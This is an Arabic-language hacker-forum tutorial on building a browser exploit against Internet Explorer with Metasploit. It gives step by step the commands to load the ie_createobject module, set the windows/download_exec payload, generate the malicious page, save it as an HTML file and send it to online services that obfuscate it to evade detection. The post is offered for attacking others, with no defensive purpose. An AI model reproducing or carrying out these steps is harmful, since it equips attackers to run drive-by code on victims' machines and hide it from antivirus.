تحية لكم ياأعضاء منتديات جيوش الهكرز ، سنتنال في موضوعنا إن شاء الله طريقة عمل ثغرة لمتصفح الإكسبلورر ، نقوم بفتح اداة الميتا Metasploit web وسوف تنفتح الاداة لنا في المتصفح كما في الصورة التالية :نضغط على خيار console ومن ثم ننفذ امر الاستعراض للاكسبلويتات


كود:
show exploits


نقوم باختيار الاكسبلويت التالي :


كود:
use windows/browser/ie_createobject


ومن ثم كالمعتاد نقوم باستعراض الخيارات بامر :

كود:
show options
وسنقوم بالتعديل على خيار الاسم بالامر :

كود:
set URIPATH xxxx
بدل xxxx ضع اي اسم تريد




بعد ذلك سنقوم باستعراض البايلودات وتحديد المناسب لنا من خلال الاوامر التالية :


كود:
show payloads
set payload windows/download_exec


بعد ذلك نقوم باستعراض الخيارات واعتقد معروف الامر ونطبق الموضح في الصور التالية :







الأن نقوم بتطبيق الخطوات والخيارات التي عدلناها سابقا من خلال الأمر :


كود:
exploit
سوف يعطينا رابط يحتوي على الثغرة التي قام بعملها نقوم بنسخ الرابط




نضع الرابط في المتصفح وستظهر لنا الثغرة نقوم بتحديد مصدر الصفحة ونقوم بتحديد الكل داخل المصدر ونقوم بنسخها ولصقها في ملف نوتباد وحفظها بامتداد html




سينتج لنا ملف للثغرة كما بالصورة التالية



طبعا الثغرة مكشوفة وتحتاج الى تشفير وهنالك العديد من المواقع التي تقدم خدمة تشفير ثغرات html وفي الرابط التالي احد المواقع




نسأل الله أن نكون قد وفقنا في إيصال الفكرة بشكل مناسب ونأسف على أي قصور


ودمتم سالمين